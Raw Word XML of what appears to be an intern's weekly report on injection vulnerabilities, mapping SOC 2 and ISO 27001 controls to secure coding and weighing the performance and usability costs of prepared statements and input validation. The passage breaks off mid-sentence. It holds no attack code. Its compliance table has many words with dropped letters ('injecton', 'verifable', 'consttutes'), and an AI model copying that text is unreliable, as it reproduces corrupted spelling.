            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>remediaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> for</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">severe code-level </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>injecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> defects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="299CC4CC" w14:textId="77777777" w:rsidTr="00B064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8B24B8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>SOC 2 Type II</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Cloud/SaaS Providers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E0C78E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Trust Services</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Criteria:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Common</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Criteria 7.1 &amp; 7.3</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>(CC7.1 / CC7.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8698B2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Requires </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>verifable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> evidence that the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>organizaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>actvely</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> monitors its perimeters</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">for anomalies (such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>injecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>atempts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>runs a formal patch management program to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">address severe codebase </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>vulnerabilites</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7F5B47E1" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E36A1AB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>ISO/IEC 27001:2022</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(InfoSec Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10E51BFA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Annex A.8.25</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(Secure</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Development</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Lifecycle) &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>A.8.28</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>(Secure Coding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406F0D3A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Organizatons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> must </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>defne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, document, and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>audit secure coding principles across</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>development teams. Leaving raw string</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>concatenaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> pathways unpatched</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>consttutes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>operatonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> failure under their</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>contnuous</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> improvement lifecycle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BE16C76" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Operational &amp; Team Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420AD018"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To round out your internship weekly report, this final section addresses the operational realities of remediation: the architectural trade-offs between performance and security, and the human engineering factors that cause this vulnerability to persist in development teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE11D8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. The "Fix" Trade-offs: Security vs. Performance vs. UX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F5F3D"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 xml:space="preserve">Implementing robust security controls inevitably introduces changes to application behavior. However, the modern defenses against injection flaws are unique because they often </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>improve</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than degrade system performance when implemented correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD583DA"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Performance Impacts (Latency &amp; Overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2FE9C2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Parameterized Queries (Prepared Statements):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Myth:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Some developers fear that prepared statements introduce round-trip network latency because they require a two-step process: preparing the query template, then sending the parameter data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15278DB9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Reality:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In high-throughput production environments, prepared statements actually </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>enhance performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Because the database engine compiles and caches the query execution plan the first time it is run, subsequent executions with different user parameters bypass the heavy parsing stage. This significantly reduces database CPU overhead and latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2974A84F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Server-Side Input Validation &amp; Sanitization:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Running complex regular expressions or schema validations on every inbound HTTP request adds fractional microsecond latency. While technically an overhead, it is computationally negligible compared to the processing costs of downstream database execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6997B7"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User Experience (UX) Impact &amp; Balancing Usability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE5074" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The UX Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Overly restrictive character allow-lists (e.g., completely blocking </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' - "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91271D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
